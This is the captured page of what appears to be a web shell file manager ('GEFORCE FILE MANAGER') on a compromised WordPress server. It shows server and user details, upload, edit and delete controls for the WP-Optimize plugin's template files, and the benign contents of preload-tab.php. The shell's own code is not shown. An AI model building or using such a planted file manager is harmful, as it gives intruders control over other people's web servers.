[ SYSTEM ]: Linux wordpress 6.1.0-41-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.158-1 (2025-11-09) x86_64
[ SERVER ]: Apache/2.4.66 (Debian) | PHP: 8.2.30
[ USER ]: www-data | IP: 172.19.30.54
GEFORCE FILE MANAGER
/
var
/
www
/
html
/
wordpress
/
wp-content
/
plugins
/
wp-optimize
/
templates
/
minify
/
UPLOAD:
NAME
SIZE
QUICK PERMS
ACTIONS
📄 advanced-tab.php
14,270 B
SET
[ EDIT ]
|
[ DEL ]
📄 analytics-settings-tab.php
3,276 B
SET
[ EDIT ]
|
[ DEL ]
📄 asset-preload.php
1,094 B
SET
[ EDIT ]
|
[ DEL ]
📄 cached-file-log.php
1,662 B
SET
[ EDIT ]
|
[ DEL ]
📄 cached-file.php
1,025 B
SET
[ EDIT ]
|
[ DEL ]
📄 capo-js.php
1,031 B
SET
[ EDIT ]
|
[ DEL ]
📄 font-settings-tab.php
9,545 B
SET
[ EDIT ]
|
[ DEL ]
📄 html-settings-tab.php
297 B
SET
[ EDIT ]
|
[ DEL ]
📄 js-settings-tab.php
12,912 B
SET
[ EDIT ]
|
[ DEL ]
📄 preload-tab.php
1,989 B
SET
[ EDIT ]
|
[ DEL ]
📄 settings-tab.php
5,552 B
SET
[ EDIT ]
|
[ DEL ]
📄 status-tab.php
12,792 B
SET
[ EDIT ]
|
[ DEL ]
DELETE SELECTED
[ CLOSE ]
EDIT: preload-tab.php
<?php if (!defined('WPO_VERSION')) die('No direct access allowed'); ?> <div class="wpo_section wpo_group"> <form> <?php if ($is_cache_enabled) : ?> <div id="minify-preload" class="notice notice-warning wpo-warning below-h2 wpo-show"> <p> <span class="dashicons dashicons-info"></span> <?php $message = esc_html__('You are using WP-Optimize for page caching.', 'wp-optimize'); $message .= ' '; $message .= esc_html__('Because of that, the pre-load settings used for page-caching are used.', 'wp-optimize'); $message .= ' '; // translators: %1$s is a opening anchor tag and %2$s is a closing anchor tag $message .= sprintf(esc_html__('i.e. To configure pre-loading, go to the %1$sCache Preload settings in the caching section%2$s instead.', 'wp-optimize'), '<a href="' . esc_url(admin_url('admin.php?page=wpo_cache&tab=wp_optimize_preload')) . '">', '</a>'); echo wp_kses_post($message); ?> <br> </p> </div> <?php endif; ?> <h3 class="wpo-first-child"><?php esc_html_e('Preload now', 'wp-optimize'); ?></h3> <div class="wpo-fieldgroup"> <p> <input id="wp_optimize_run_minify_preload" class="button button-primary" type="submit" name="wp_optimize_run_minify_preload" value="<?php echo $is_running ? esc_attr__('Cancel', 'wp-optimize') : esc_attr__('Run now', 'wp-optimize'); ?>" <?php echo $is_running ? 'data-running="1"' : ''; ?> <?php echo $is_cache_enabled ? "disabled" : ""; ?> > <span id="wp_optimize_preload_minify_status"><?php echo esc_html($status_message); ?></span> </p> <span> <?php esc_html_e('This action will trigger WP-Optimize to generate minify assets by visiting pages to preload them (so that they are ready the first time a human visitor wants them).', 'wp-optimize'); ?> <?php esc_html_e('If a sitemap is available, then it will be used to determine which assets get minified.', 'wp-optimize'); ?> </span> </div> </form> </div>